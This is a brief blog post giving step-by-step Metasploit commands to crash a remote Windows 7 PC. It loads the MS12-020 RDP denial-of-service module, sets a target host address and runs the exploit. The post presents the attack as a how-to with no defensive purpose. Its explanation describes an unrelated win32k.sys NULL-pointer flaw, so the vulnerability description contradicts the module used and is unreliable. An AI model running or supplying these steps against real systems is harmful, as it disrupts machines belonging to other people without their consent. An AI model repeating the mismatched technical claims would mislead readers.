Saturday, April 5, 2014

How to Perform Blue Screen Death Attack on Remote Windows 7 PC



This Metasploit module exploits vulnerability in win32k.sys where under specific conditions Track Popup Menu Ex will pass a NULL pointer to the MN End Menu State procedure. This Metasploit module has been tested successfully on Windows 7 SP0 and Windows 7 SP1

Now Open Kali Linux terminal type msfconsole


Now type use auxiliary/dos/windows/rdp/ms12_020_maxchannelids
msf auxiliary(ms12_020_maxchannelids) > show options


msf auxiliary(ms12_020_maxchannelids) > set RHOST 192.168.0.105
msf auxiliary(ms12_020_maxchannelids) > show options

msf auxiliary(ms12_020_maxchannelids) > exploit










No comments:

Post a Comment

Contact Form

Name

Email *

Message *